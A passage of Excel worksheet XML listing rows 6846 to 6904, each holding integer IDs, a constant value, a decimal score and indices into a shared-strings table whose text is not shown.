      </c>
      <c r="G6846" t="s">
        <v>13540</v>
      </c>
      <c r="H6846" t="s">
        <v>13541</v>
      </c>
    </row>
    <row r="6847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6847" s="1">
        <v>6845</v>
      </c>
      <c r="B6847">
        <v>1554</v>
      </c>
      <c r="C6847">
        <v>1554</v>
      </c>
      <c r="D6847">
        <v>4</v>
      </c>
      <c r="E6847">
        <v>0.4968000054359436</v>
      </c>
      <c r="F6847" t="s">
        <v>13461</v>
      </c>
      <c r="G6847" t="s">
        <v>13542</v>
      </c>
      <c r="H6847" t="s">
        <v>13543</v>
      </c>
    </row>
    <row r="6848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6848" s="1">
        <v>6846</v>
      </c>
      <c r="B6848">
        <v>7893</v>
      </c>
      <c r="C6848">
        <v>7893</v>
      </c>
      <c r="D6848">
        <v>4</v>
      </c>
      <c r="E6848">
        <v>0.49369999766349792</v>
      </c>
      <c r="F6848" t="s">
        <v>13461</v>
      </c>
      <c r="G6848" t="s">
        <v>13544</v>
      </c>
      <c r="H6848" t="s">
        <v>13545</v>
      </c>
    </row>
    <row r="6849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6849" s="1">
        <v>6847</v>
      </c>
      <c r="B6849">
        <v>7896</v>
      </c>
      <c r="C6849">
        <v>7896</v>
      </c>
      <c r="D6849">
        <v>4</v>
      </c>
      <c r="E6849">
        <v>0.90979999303817749</v>
      </c>
      <c r="F6849" t="s">
        <v>13461</v>
      </c>
      <c r="G6849" t="s">
        <v>13546</v>
      </c>
      <c r="H6849" t="s">
        <v>13547</v>
      </c>
    </row>
    <row r="6850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6850" s="1">
        <v>6848</v>
      </c>
      <c r="B6850">
        <v>7219</v>
      </c>
      <c r="C6850">
        <v>7219</v>
      </c>
      <c r="D6850">
        <v>4</v>
      </c>
      <c r="E6850">
        <v>0.57609999179840088</v>
      </c>
      <c r="F6850" t="s">
        <v>13461</v>
      </c>
      <c r="G6850" t="s">
        <v>13548</v>
      </c>
      <c r="H6850" t="s">
        <v>13549</v>
      </c>
    </row>
    <row r="6851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6851" s="1">
        <v>6849</v>
      </c>
      <c r="B6851">
        <v>1582</v>
      </c>
      <c r="C6851">
        <v>1582</v>
      </c>
      <c r="D6851">
        <v>4</v>
      </c>
      <c r="E6851">
        <v>0.55909997224807739</v>
      </c>
      <c r="F6851" t="s">
        <v>13461</v>
      </c>
      <c r="G6851" t="s">
        <v>13550</v>
      </c>
      <c r="H6851" t="s">
        <v>13551</v>
      </c>
    </row>
    <row r="6852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6852" s="1">
        <v>6850</v>
      </c>
      <c r="B6852">
        <v>7232</v>
      </c>
      <c r="C6852">
        <v>7232</v>
      </c>
      <c r="D6852">
        <v>4</v>
      </c>
      <c r="E6852">
        <v>0.92629998922348022</v>
      </c>
      <c r="F6852" t="s">
        <v>13461</v>
      </c>
      <c r="G6852" t="s">
        <v>13552</v>
      </c>
      <c r="H6852" t="s">
        <v>13553</v>
      </c>
    </row>
    <row r="6853" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6853" s="1">
        <v>6851</v>
      </c>
      <c r="B6853">
        <v>44</v>
      </c>
      <c r="C6853">
        <v>44</v>
      </c>
      <c r="D6853">
        <v>4</v>
      </c>
      <c r="E6853">
        <v>0.85930001735687256</v>
      </c>
      <c r="F6853" t="s">
        <v>13461</v>
      </c>
      <c r="G6853" t="s">
        <v>13554</v>
      </c>
      <c r="H6853" t="s">
        <v>13555</v>
      </c>
    </row>
    <row r="6854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6854" s="1">
        <v>6852</v>
      </c>
      <c r="B6854">
        <v>1592</v>
      </c>
      <c r="C6854">
        <v>1592</v>
      </c>
      <c r="D6854">
        <v>4</v>
      </c>
      <c r="E6854">
        <v>0.99989998340606689</v>
      </c>
      <c r="F6854" t="s">
        <v>13461</v>
      </c>
      <c r="G6854" t="s">
        <v>13556</v>
      </c>
      <c r="H6854" t="s">
        <v>13557</v>
      </c>
    </row>
    <row r="6855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6855" s="1">
        <v>6853</v>
      </c>
      <c r="B6855">
        <v>7884</v>
      </c>
      <c r="C6855">
        <v>7884</v>
      </c>
      <c r="D6855">
        <v>4</v>
      </c>
      <c r="E6855">
        <v>0.99739998579025269</v>
      </c>
      <c r="F6855" t="s">
        <v>13461</v>
      </c>
      <c r="G6855" t="s">
        <v>13558</v>
      </c>
      <c r="H6855" t="s">
        <v>13559</v>
      </c>
    </row>
    <row r="6856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6856" s="1">
        <v>6854</v>
      </c>
      <c r="B6856">
        <v>7214</v>
      </c>
      <c r="C6856">
        <v>7214</v>
      </c>
      <c r="D6856">
        <v>4</v>
      </c>
      <c r="E6856">
        <v>0.68449997901916504</v>
      </c>
      <c r="F6856" t="s">
        <v>13461</v>
      </c>
      <c r="G6856" t="s">
        <v>13560</v>
      </c>
      <c r="H6856" t="s">
        <v>13561</v>
      </c>
    </row>
    <row r="6857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6857" s="1">
        <v>6855</v>
      </c>
      <c r="B6857">
        <v>1593</v>
      </c>
      <c r="C6857">
        <v>1593</v>
      </c>
      <c r="D6857">
        <v>4</v>
      </c>
      <c r="E6857">
        <v>0.90729999542236328</v>
      </c>
      <c r="F6857" t="s">
        <v>13461</v>
      </c>
      <c r="G6857" t="s">
        <v>13562</v>
      </c>
      <c r="H6857" t="s">
        <v>13563</v>
      </c>
    </row>
    <row r="6858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6858" s="1">
        <v>6856</v>
      </c>
      <c r="B6858">
        <v>7899</v>
      </c>
      <c r="C6858">
        <v>7899</v>
      </c>
      <c r="D6858">
        <v>4</v>
      </c>
      <c r="E6858">
        <v>0.99779999256134033</v>
      </c>
      <c r="F6858" t="s">
        <v>13461</v>
      </c>
      <c r="G6858" t="s">
        <v>13564</v>
      </c>
      <c r="H6858" t="s">
        <v>13565</v>
      </c>
    </row>
    <row r="6859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6859" s="1">
        <v>6857</v>
      </c>
      <c r="B6859">
        <v>7212</v>
      </c>
      <c r="C6859">
        <v>7212</v>
      </c>
      <c r="D6859">
        <v>4</v>
      </c>
      <c r="E6859">
        <v>0.59390002489089966</v>
      </c>
      <c r="F6859" t="s">
        <v>13461</v>
      </c>
      <c r="G6859" t="s">
        <v>13566</v>
      </c>
      <c r="H6859" t="s">
        <v>13567</v>
      </c>
    </row>
    <row r="6860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6860" s="1">
        <v>6858</v>
      </c>
      <c r="B6860">
        <v>1527</v>
      </c>
      <c r="C6860">
        <v>1527</v>
      </c>
      <c r="D6860">
        <v>4</v>
      </c>
      <c r="E6860">
        <v>0.95010000467300415</v>
      </c>
      <c r="F6860" t="s">
        <v>13461</v>
      </c>
      <c r="G6860" t="s">
        <v>13568</v>
      </c>
      <c r="H6860" t="s">
        <v>13569</v>
      </c>
    </row>
    <row r="6861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6861" s="1">
        <v>6859</v>
      </c>
      <c r="B6861">
        <v>1595</v>
      </c>
      <c r="C6861">
        <v>1595</v>
      </c>
      <c r="D6861">
        <v>4</v>
      </c>
      <c r="E6861">
        <v>0.86129999160766602</v>
      </c>
      <c r="F6861" t="s">
        <v>13461</v>
      </c>
      <c r="G6861" t="s">
        <v>13570</v>
      </c>
      <c r="H6861" t="s">
        <v>13571</v>
      </c>
    </row>
    <row r="6862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6862" s="1">
        <v>6860</v>
      </c>
      <c r="B6862">
        <v>1499</v>
      </c>
      <c r="C6862">
        <v>1499</v>
      </c>
      <c r="D6862">
        <v>4</v>
      </c>
      <c r="E6862">
        <v>0.60589998960494995</v>
      </c>
      <c r="F6862" t="s">
        <v>13461</v>
      </c>
      <c r="G6862" t="s">
        <v>13572</v>
      </c>
      <c r="H6862" t="s">
        <v>13573</v>
      </c>
    </row>
    <row r="6863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6863" s="1">
        <v>6861</v>
      </c>
      <c r="B6863">
        <v>7197</v>
      </c>
      <c r="C6863">
        <v>7197</v>
      </c>
      <c r="D6863">
        <v>4</v>
      </c>
      <c r="E6863">
        <v>0.78869998455047607</v>
      </c>
      <c r="F6863" t="s">
        <v>13461</v>
      </c>
      <c r="G6863" t="s">
        <v>13574</v>
      </c>
      <c r="H6863" t="s">
        <v>13575</v>
      </c>
    </row>
    <row r="6864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6864" s="1">
        <v>6862</v>
      </c>
      <c r="B6864">
        <v>1491</v>
      </c>
      <c r="C6864">
        <v>1491</v>
      </c>
      <c r="D6864">
        <v>4</v>
      </c>
      <c r="E6864">
        <v>0.88840001821517944</v>
      </c>
      <c r="F6864" t="s">
        <v>13461</v>
      </c>
      <c r="G6864" t="s">
        <v>13576</v>
      </c>
      <c r="H6864" t="s">
        <v>13577</v>
      </c>
    </row>
    <row r="6865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6865" s="1">
        <v>6863</v>
      </c>
      <c r="B6865">
        <v>1627</v>
      </c>
      <c r="C6865">
        <v>1627</v>
      </c>
      <c r="D6865">
        <v>4</v>
      </c>
      <c r="E6865">
        <v>0.58459997177124023</v>
      </c>
      <c r="F6865" t="s">
        <v>13461</v>
      </c>
      <c r="G6865" t="s">
        <v>13578</v>
      </c>
      <c r="H6865" t="s">
        <v>13579</v>
      </c>
    </row>
    <row r="6866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6866" s="1">
        <v>6864</v>
      </c>
      <c r="B6866">
        <v>7276</v>
      </c>
      <c r="C6866">
        <v>7276</v>
      </c>
      <c r="D6866">
        <v>4</v>
      </c>
      <c r="E6866">
        <v>0.79610002040863037</v>
      </c>
      <c r="F6866" t="s">
        <v>13461</v>
      </c>
      <c r="G6866" t="s">
        <v>13580</v>
      </c>
      <c r="H6866" t="s">
        <v>13581</v>
      </c>
    </row>
    <row r="6867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6867" s="1">
        <v>6865</v>
      </c>
      <c r="B6867">
        <v>7180</v>
      </c>
      <c r="C6867">
        <v>7180</v>
      </c>
      <c r="D6867">
        <v>4</v>
      </c>
      <c r="E6867">
        <v>0.64880001544952393</v>
      </c>
      <c r="F6867" t="s">
        <v>13461</v>
      </c>
      <c r="G6867" t="s">
        <v>13582</v>
      </c>
      <c r="H6867" t="s">
        <v>13583</v>
      </c>
    </row>
    <row r="6868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6868" s="1">
        <v>6866</v>
      </c>
      <c r="B6868">
        <v>1631</v>
      </c>
      <c r="C6868">
        <v>1631</v>
      </c>
      <c r="D6868">
        <v>4</v>
      </c>
      <c r="E6868">
        <v>0.70670002698898315</v>
      </c>
      <c r="F6868" t="s">
        <v>13461</v>
      </c>
      <c r="G6868" t="s">
        <v>13584</v>
      </c>
      <c r="H6868" t="s">
        <v>13585</v>
      </c>
    </row>
    <row r="6869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6869" s="1">
        <v>6867</v>
      </c>
      <c r="B6869">
        <v>1635</v>
      </c>
      <c r="C6869">
        <v>1635</v>
      </c>
      <c r="D6869">
        <v>4</v>
      </c>
      <c r="E6869">
        <v>0.68040001392364502</v>
      </c>
      <c r="F6869" t="s">
        <v>13461</v>
      </c>
      <c r="G6869" t="s">
        <v>13586</v>
      </c>
      <c r="H6869" t="s">
        <v>13539</v>
      </c>
    </row>
    <row r="6870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6870" s="1">
        <v>6868</v>
      </c>
      <c r="B6870">
        <v>1645</v>
      </c>
      <c r="C6870">
        <v>1645</v>
      </c>
      <c r="D6870">
        <v>4</v>
      </c>
      <c r="E6870">
        <v>0.8913000226020813</v>
      </c>
      <c r="F6870" t="s">
        <v>13461</v>
      </c>
      <c r="G6870" t="s">
        <v>13587</v>
      </c>
      <c r="H6870" t="s">
        <v>13588</v>
      </c>
    </row>
    <row r="6871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6871" s="1">
        <v>6869</v>
      </c>
      <c r="B6871">
        <v>1649</v>
      </c>
      <c r="C6871">
        <v>1649</v>
      </c>
      <c r="D6871">
        <v>4</v>
      </c>
      <c r="E6871">
        <v>0.48660001158714289</v>
      </c>
      <c r="F6871" t="s">
        <v>13461</v>
      </c>
      <c r="G6871" t="s">
        <v>13589</v>
      </c>
      <c r="H6871" t="s">
        <v>13590</v>
      </c>
    </row>
    <row r="6872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6872" s="1">
        <v>6870</v>
      </c>
      <c r="B6872">
        <v>144</v>
      </c>
      <c r="C6872">
        <v>144</v>
      </c>
      <c r="D6872">
        <v>4</v>
      </c>
      <c r="E6872">
        <v>0.87919998168945313</v>
      </c>
      <c r="F6872" t="s">
        <v>13461</v>
      </c>
      <c r="G6872" t="s">
        <v>13591</v>
      </c>
      <c r="H6872" t="s">
        <v>13592</v>
      </c>
    </row>
    <row r="6873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6873" s="1">
        <v>6871</v>
      </c>
      <c r="B6873">
        <v>7174</v>
      </c>
      <c r="C6873">
        <v>7174</v>
      </c>
      <c r="D6873">
        <v>4</v>
      </c>
      <c r="E6873">
        <v>0.99800002574920654</v>
      </c>
      <c r="F6873" t="s">
        <v>13461</v>
      </c>
      <c r="G6873" t="s">
        <v>13593</v>
      </c>
      <c r="H6873" t="s">
        <v>13594</v>
      </c>
    </row>
    <row r="6874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6874" s="1">
        <v>6872</v>
      </c>
      <c r="B6874">
        <v>1432</v>
      </c>
      <c r="C6874">
        <v>1432</v>
      </c>
      <c r="D6874">
        <v>4</v>
      </c>
      <c r="E6874">
        <v>0.69809997081756592</v>
      </c>
      <c r="F6874" t="s">
        <v>13461</v>
      </c>
      <c r="G6874" t="s">
        <v>13595</v>
      </c>
      <c r="H6874" t="s">
        <v>13596</v>
      </c>
    </row>
    <row r="6875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6875" s="1">
        <v>6873</v>
      </c>
      <c r="B6875">
        <v>1429</v>
      </c>
      <c r="C6875">
        <v>1429</v>
      </c>
      <c r="D6875">
        <v>4</v>
      </c>
      <c r="E6875">
        <v>0.8069000244140625</v>
      </c>
      <c r="F6875" t="s">
        <v>13461</v>
      </c>
      <c r="G6875" t="s">
        <v>13597</v>
      </c>
      <c r="H6875" t="s">
        <v>13598</v>
      </c>
    </row>
    <row r="6876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6876" s="1">
        <v>6874</v>
      </c>
      <c r="B6876">
        <v>148</v>
      </c>
      <c r="C6876">
        <v>148</v>
      </c>
      <c r="D6876">
        <v>4</v>
      </c>
      <c r="E6876">
        <v>0.97450000047683716</v>
      </c>
      <c r="F6876" t="s">
        <v>13461</v>
      </c>
      <c r="G6876" t="s">
        <v>13599</v>
      </c>
      <c r="H6876" t="s">
        <v>13600</v>
      </c>
    </row>
    <row r="6877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6877" s="1">
        <v>6875</v>
      </c>
      <c r="B6877">
        <v>7281</v>
      </c>
      <c r="C6877">
        <v>7281</v>
      </c>
      <c r="D6877">
        <v>4</v>
      </c>
      <c r="E6877">
        <v>0.99949997663497925</v>
      </c>
      <c r="F6877" t="s">
        <v>13461</v>
      </c>
      <c r="G6877" t="s">
        <v>13601</v>
      </c>
      <c r="H6877" t="s">
        <v>13602</v>
      </c>
    </row>
    <row r="6878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6878" s="1">
        <v>6876</v>
      </c>
      <c r="B6878">
        <v>1411</v>
      </c>
      <c r="C6878">
        <v>1411</v>
      </c>
      <c r="D6878">
        <v>4</v>
      </c>
      <c r="E6878">
        <v>0.50440001487731934</v>
      </c>
      <c r="F6878" t="s">
        <v>13461</v>
      </c>
      <c r="G6878" t="s">
        <v>13603</v>
      </c>
      <c r="H6878" t="s">
        <v>13604</v>
      </c>
    </row>
    <row r="6879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6879" s="1">
        <v>6877</v>
      </c>
      <c r="B6879">
        <v>153</v>
      </c>
      <c r="C6879">
        <v>153</v>
      </c>
      <c r="D6879">
        <v>4</v>
      </c>
      <c r="E6879">
        <v>0.96289998292922974</v>
      </c>
      <c r="F6879" t="s">
        <v>13461</v>
      </c>
      <c r="G6879" t="s">
        <v>13605</v>
      </c>
      <c r="H6879" t="s">
        <v>13606</v>
      </c>
    </row>
    <row r="6880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6880" s="1">
        <v>6878</v>
      </c>
      <c r="B6880">
        <v>7275</v>
      </c>
      <c r="C6880">
        <v>7275</v>
      </c>
      <c r="D6880">
        <v>4</v>
      </c>
      <c r="E6880">
        <v>0.63440001010894775</v>
      </c>
      <c r="F6880" t="s">
        <v>13461</v>
      </c>
      <c r="G6880" t="s">
        <v>13607</v>
      </c>
      <c r="H6880" t="s">
        <v>13608</v>
      </c>
    </row>
    <row r="6881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6881" s="1">
        <v>6879</v>
      </c>
      <c r="B6881">
        <v>131</v>
      </c>
      <c r="C6881">
        <v>131</v>
      </c>
      <c r="D6881">
        <v>4</v>
      </c>
      <c r="E6881">
        <v>0.68220001459121704</v>
      </c>
      <c r="F6881" t="s">
        <v>13461</v>
      </c>
      <c r="G6881" t="s">
        <v>13609</v>
      </c>
      <c r="H6881" t="s">
        <v>13610</v>
      </c>
    </row>
    <row r="6882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6882" s="1">
        <v>6880</v>
      </c>
      <c r="B6882">
        <v>7182</v>
      </c>
      <c r="C6882">
        <v>7182</v>
      </c>
      <c r="D6882">
        <v>4</v>
      </c>
      <c r="E6882">
        <v>0.92599999904632568</v>
      </c>
      <c r="F6882" t="s">
        <v>13461</v>
      </c>
      <c r="G6882" t="s">
        <v>13611</v>
      </c>
      <c r="H6882" t="s">
        <v>13612</v>
      </c>
    </row>
    <row r="6883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6883" s="1">
        <v>6881</v>
      </c>
      <c r="B6883">
        <v>119</v>
      </c>
      <c r="C6883">
        <v>119</v>
      </c>
      <c r="D6883">
        <v>4</v>
      </c>
      <c r="E6883">
        <v>0.98650002479553223</v>
      </c>
      <c r="F6883" t="s">
        <v>13461</v>
      </c>
      <c r="G6883" t="s">
        <v>13613</v>
      </c>
      <c r="H6883" t="s">
        <v>13614</v>
      </c>
    </row>
    <row r="6884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6884" s="1">
        <v>6882</v>
      </c>
      <c r="B6884">
        <v>1489</v>
      </c>
      <c r="C6884">
        <v>1489</v>
      </c>
      <c r="D6884">
        <v>4</v>
      </c>
      <c r="E6884">
        <v>0.5274999737739563</v>
      </c>
      <c r="F6884" t="s">
        <v>13461</v>
      </c>
      <c r="G6884" t="s">
        <v>13615</v>
      </c>
      <c r="H6884" t="s">
        <v>13616</v>
      </c>
    </row>
    <row r="6885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6885" s="1">
        <v>6883</v>
      </c>
      <c r="B6885">
        <v>7254</v>
      </c>
      <c r="C6885">
        <v>7254</v>
      </c>
      <c r="D6885">
        <v>4</v>
      </c>
      <c r="E6885">
        <v>0.58219999074935913</v>
      </c>
      <c r="F6885" t="s">
        <v>13461</v>
      </c>
      <c r="G6885" t="s">
        <v>13617</v>
      </c>
      <c r="H6885" t="s">
        <v>13618</v>
      </c>
    </row>
    <row r="6886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6886" s="1">
        <v>6884</v>
      </c>
      <c r="B6886">
        <v>1477</v>
      </c>
      <c r="C6886">
        <v>1477</v>
      </c>
      <c r="D6886">
        <v>4</v>
      </c>
      <c r="E6886">
        <v>0.63239997625350952</v>
      </c>
      <c r="F6886" t="s">
        <v>13461</v>
      </c>
      <c r="G6886" t="s">
        <v>13619</v>
      </c>
      <c r="H6886" t="s">
        <v>13620</v>
      </c>
    </row>
    <row r="6887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6887" s="1">
        <v>6885</v>
      </c>
      <c r="B6887">
        <v>7196</v>
      </c>
      <c r="C6887">
        <v>7196</v>
      </c>
      <c r="D6887">
        <v>4</v>
      </c>
      <c r="E6887">
        <v>0.54919999837875366</v>
      </c>
      <c r="F6887" t="s">
        <v>13461</v>
      </c>
      <c r="G6887" t="s">
        <v>13621</v>
      </c>
      <c r="H6887" t="s">
        <v>13622</v>
      </c>
    </row>
    <row r="6888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6888" s="1">
        <v>6886</v>
      </c>
      <c r="B6888">
        <v>7908</v>
      </c>
      <c r="C6888">
        <v>7908</v>
      </c>
      <c r="D6888">
        <v>4</v>
      </c>
      <c r="E6888">
        <v>0.99949997663497925</v>
      </c>
      <c r="F6888" t="s">
        <v>13461</v>
      </c>
      <c r="G6888" t="s">
        <v>13623</v>
      </c>
      <c r="H6888" t="s">
        <v>13624</v>
      </c>
    </row>
    <row r="6889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6889" s="1">
        <v>6887</v>
      </c>
      <c r="B6889">
        <v>1616</v>
      </c>
      <c r="C6889">
        <v>1616</v>
      </c>
      <c r="D6889">
        <v>4</v>
      </c>
      <c r="E6889">
        <v>0.98610001802444458</v>
      </c>
      <c r="F6889" t="s">
        <v>13461</v>
      </c>
      <c r="G6889" t="s">
        <v>13625</v>
      </c>
      <c r="H6889" t="s">
        <v>13626</v>
      </c>
    </row>
    <row r="6890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6890" s="1">
        <v>6888</v>
      </c>
      <c r="B6890">
        <v>7257</v>
      </c>
      <c r="C6890">
        <v>7257</v>
      </c>
      <c r="D6890">
        <v>4</v>
      </c>
      <c r="E6890">
        <v>0.49819999933242798</v>
      </c>
      <c r="F6890" t="s">
        <v>13461</v>
      </c>
      <c r="G6890" t="s">
        <v>13627</v>
      </c>
      <c r="H6890" t="s">
        <v>13628</v>
      </c>
    </row>
    <row r="6891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6891" s="1">
        <v>6889</v>
      </c>
      <c r="B6891">
        <v>7172</v>
      </c>
      <c r="C6891">
        <v>7172</v>
      </c>
      <c r="D6891">
        <v>4</v>
      </c>
      <c r="E6891">
        <v>0.81099998950958252</v>
      </c>
      <c r="F6891" t="s">
        <v>13461</v>
      </c>
      <c r="G6891" t="s">
        <v>13629</v>
      </c>
      <c r="H6891" t="s">
        <v>13630</v>
      </c>
    </row>
    <row r="6892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6892" s="1">
        <v>6890</v>
      </c>
      <c r="B6892">
        <v>7259</v>
      </c>
      <c r="C6892">
        <v>7259</v>
      </c>
      <c r="D6892">
        <v>4</v>
      </c>
      <c r="E6892">
        <v>0.57249999046325684</v>
      </c>
      <c r="F6892" t="s">
        <v>13461</v>
      </c>
      <c r="G6892" t="s">
        <v>13631</v>
      </c>
      <c r="H6892" t="s">
        <v>13632</v>
      </c>
    </row>
    <row r="6893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6893" s="1">
        <v>6891</v>
      </c>
      <c r="B6893">
        <v>1462</v>
      </c>
      <c r="C6893">
        <v>1462</v>
      </c>
      <c r="D6893">
        <v>4</v>
      </c>
      <c r="E6893">
        <v>0.99269998073577881</v>
      </c>
      <c r="F6893" t="s">
        <v>13461</v>
      </c>
      <c r="G6893" t="s">
        <v>13633</v>
      </c>
      <c r="H6893" t="s">
        <v>13634</v>
      </c>
    </row>
    <row r="6894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6894" s="1">
        <v>6892</v>
      </c>
      <c r="B6894">
        <v>22</v>
      </c>
      <c r="C6894">
        <v>22</v>
      </c>
      <c r="D6894">
        <v>4</v>
      </c>
      <c r="E6894">
        <v>0.50029999017715454</v>
      </c>
      <c r="F6894" t="s">
        <v>13461</v>
      </c>
      <c r="G6894" t="s">
        <v>13635</v>
      </c>
      <c r="H6894" t="s">
        <v>13636</v>
      </c>
    </row>
    <row r="6895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6895" s="1">
        <v>6893</v>
      </c>
      <c r="B6895">
        <v>7265</v>
      </c>
      <c r="C6895">
        <v>7265</v>
      </c>
      <c r="D6895">
        <v>4</v>
      </c>
      <c r="E6895">
        <v>0.9966999888420105</v>
      </c>
      <c r="F6895" t="s">
        <v>13461</v>
      </c>
      <c r="G6895" t="s">
        <v>13637</v>
      </c>
      <c r="H6895" t="s">
        <v>13638</v>
      </c>
    </row>
    <row r="6896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6896" s="1">
        <v>6894</v>
      </c>
      <c r="B6896">
        <v>1453</v>
      </c>
      <c r="C6896">
        <v>1453</v>
      </c>
      <c r="D6896">
        <v>4</v>
      </c>
      <c r="E6896">
        <v>0.6590999960899353</v>
      </c>
      <c r="F6896" t="s">
        <v>13461</v>
      </c>
      <c r="G6896" t="s">
        <v>13639</v>
      </c>
      <c r="H6896" t="s">
        <v>13640</v>
      </c>
    </row>
    <row r="6897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6897" s="1">
        <v>6895</v>
      </c>
      <c r="B6897">
        <v>1452</v>
      </c>
      <c r="C6897">
        <v>1452</v>
      </c>
      <c r="D6897">
        <v>4</v>
      </c>
      <c r="E6897">
        <v>0.67739999294281006</v>
      </c>
      <c r="F6897" t="s">
        <v>13461</v>
      </c>
      <c r="G6897" t="s">
        <v>13641</v>
      </c>
      <c r="H6897" t="s">
        <v>13642</v>
      </c>
    </row>
    <row r="6898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6898" s="1">
        <v>6896</v>
      </c>
      <c r="B6898">
        <v>7270</v>
      </c>
      <c r="C6898">
        <v>7270</v>
      </c>
      <c r="D6898">
        <v>4</v>
      </c>
      <c r="E6898">
        <v>0.48800000548362732</v>
      </c>
      <c r="F6898" t="s">
        <v>13461</v>
      </c>
      <c r="G6898" t="s">
        <v>13643</v>
      </c>
      <c r="H6898" t="s">
        <v>13644</v>
      </c>
    </row>
    <row r="6899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6899" s="1">
        <v>6897</v>
      </c>
      <c r="B6899">
        <v>1626</v>
      </c>
      <c r="C6899">
        <v>1626</v>
      </c>
      <c r="D6899">
        <v>4</v>
      </c>
      <c r="E6899">
        <v>0.92280000448226929</v>
      </c>
      <c r="F6899" t="s">
        <v>13461</v>
      </c>
      <c r="G6899" t="s">
        <v>13645</v>
      </c>
      <c r="H6899" t="s">
        <v>13646</v>
      </c>
    </row>
    <row r="6900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6900" s="1">
        <v>6898</v>
      </c>
      <c r="B6900">
        <v>7260</v>
      </c>
      <c r="C6900">
        <v>7260</v>
      </c>
      <c r="D6900">
        <v>4</v>
      </c>
      <c r="E6900">
        <v>0.65479999780654907</v>
      </c>
      <c r="F6900" t="s">
        <v>13461</v>
      </c>
      <c r="G6900" t="s">
        <v>13647</v>
      </c>
      <c r="H6900" t="s">
        <v>13648</v>
      </c>
    </row>
    <row r="6901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6901" s="1">
        <v>6899</v>
      </c>
      <c r="B6901">
        <v>1625</v>
      </c>
      <c r="C6901">
        <v>1625</v>
      </c>
      <c r="D6901">
        <v>4</v>
      </c>
      <c r="E6901">
        <v>0.88899999856948853</v>
      </c>
      <c r="F6901" t="s">
        <v>13461</v>
      </c>
      <c r="G6901" t="s">
        <v>13649</v>
      </c>
      <c r="H6901" t="s">
        <v>13650</v>
      </c>
    </row>
    <row r="6902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6902" s="1">
        <v>6900</v>
      </c>
      <c r="B6902">
        <v>683</v>
      </c>
      <c r="C6902">
        <v>683</v>
      </c>
      <c r="D6902">
        <v>4</v>
      </c>
      <c r="E6902">
        <v>0.59270000457763672</v>
      </c>
      <c r="F6902" t="s">
        <v>13461</v>
      </c>
      <c r="G6902" t="s">
        <v>13651</v>
      </c>
      <c r="H6902" t="s">
        <v>13652</v>
      </c>
    </row>
    <row r="6903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6903" s="1">
        <v>6901</v>
      </c>
      <c r="B6903">
        <v>1337</v>
      </c>
      <c r="C6903">
        <v>1337</v>
      </c>
      <c r="D6903">
        <v>4</v>
      </c>
      <c r="E6903">
        <v>0.77789998054504395</v>
      </c>
      <c r="F6903" t="s">
        <v>13461</v>
      </c>
      <c r="G6903" t="s">
        <v>13653</v>
      </c>
      <c r="H6903" t="s">
        <v>13654</v>
      </c>
    </row>
    <row r="6904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6904" s="1">
        <v>6902</v>
      </c>
      <c r="B6904">
        <v>473</v>
      </c>
      <c r="C6904">
        <v>473</v>
      </c>
      <c r="D6904">
        <v>4</v>
      </c>
      <c r="E6904">
        <v>0.63020002841949463</v>
      </c>
      <c r="F6904" t="s">
        <v>13461</v>
      </c>
      <c r="G6904" t="s">
        <v>13655</v>
      </c>
      <c r="H6904" t="s">
        <v>13656</v>
      </c>
    </row>
    <row r="6905" spans="1:8" x14ac:dyDescent="0.45">
